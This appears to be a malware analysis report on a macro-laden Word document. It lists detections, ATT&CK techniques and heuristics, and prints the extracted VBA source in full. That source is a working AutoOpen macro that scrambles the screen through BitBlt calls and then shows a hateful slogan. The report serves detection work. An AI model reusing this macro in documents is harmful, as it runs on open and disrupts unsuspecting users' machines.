MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro with an AutoOpen subroutine, which is a common technique for malicious documents. The macro attempts to perform graphical operations using BitBlt and GetDC, and displays a message box with the text 'Feel the white power...'. This behavior, combined with the ClamAV detection 'Doc.Dropper.Agent-5909269-0', strongly suggests it's a dropper or downloader.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-5909269-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-5909269-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1113 bytes |
SHA-256: c480b888677299dc95edf0807823289fc6d85f154737ab2befaaf7020a76e490 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Zelda" Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal XSrc As Long, ByVal YSrc As Long, ByVal dwRop As Long) As Long Sub AutoOpen() On Error Resume Next Application.WindowState = wdWindowStateMinimize Randomize For graf = 1 To 110000 Randomize c = GetDC(0) x = Int(Rnd * 600) + 1 Y = Int(Rnd * 800) + 1 X1 = x + 1 Y1 = Y + 1 c = BitBlt(c, Y1, X1, 6, 6, c, Y, x, -3) Next graf MsgBox "Feel the white power...", vbInformation, "Win32/VBS.Angeldust" End Sub Sub helpabout() On Error Resume Next Randomize dc = GetDC(0) Blt = BitBlt(dc, 0, 0, 1024, 768, dc, 0, 0, &H550009) End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.